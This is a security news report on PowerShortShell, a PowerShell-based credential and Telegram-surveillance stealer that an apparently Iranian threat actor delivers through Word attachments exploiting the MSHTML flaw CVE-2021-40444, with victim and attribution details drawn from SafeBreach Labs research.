A new Iranian threat actor was found exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims worldwide using a new PowerShell-based information stealer dubbed PowerShortShell.
The info stealer is used for stealing Google and Instagram credentials and also for Telegram surveillance and collecting system information from compromised devices which are sent to attacker-controlled servers together with the stolen credentials.
The attacks were discovered by researchers at SafeBreach Labs and the attacks started in July as spear-phishing emails.
They target Windows users with malicious Winword attachments that exploit a Microsoft MSHTML remote code execution (RCE) bug tracked as CVE-2021-40444.
The PowerShortShell stealer payload is executed by a DLL downloaded on compromised systems. Once launched, the PowerShell script collects data and screen snapshots, exfiltrating it to the attacker’s command-and-control server.
According to Tomer Bar, Director of Security Research at SafeBreach Labs, almost half of the victims are located in the United States. Based on the Microsoft Word document content – which blames Iran’s leader for the ‘Corona massacre’ and the nature of the collected data, they assume that the victims might be Iranians who live abroad and might be seen as a threat to Iran’s Islamic regime.
The adversary might be linked to Iran’s Islamic regime since the Telegram surveillance usage is typical of Iran’s threat actors like Infy, Ferocious Kitten, and Rampant Kitten.
The CVE-2021-40444 RCE bug impacting IE’s MSTHML rendering engine has been exploited in the wild as a zero-day. Microsoft has released a patch for the flaw.
More and more attackers are using CVE-2021-40444 exploits since threat actors started sharing tutorials and proof-of-concept exploits on hacking forums even before the bug was patched.
This allowed other threat actors and groups to start exploiting the security flaw in their own attacks.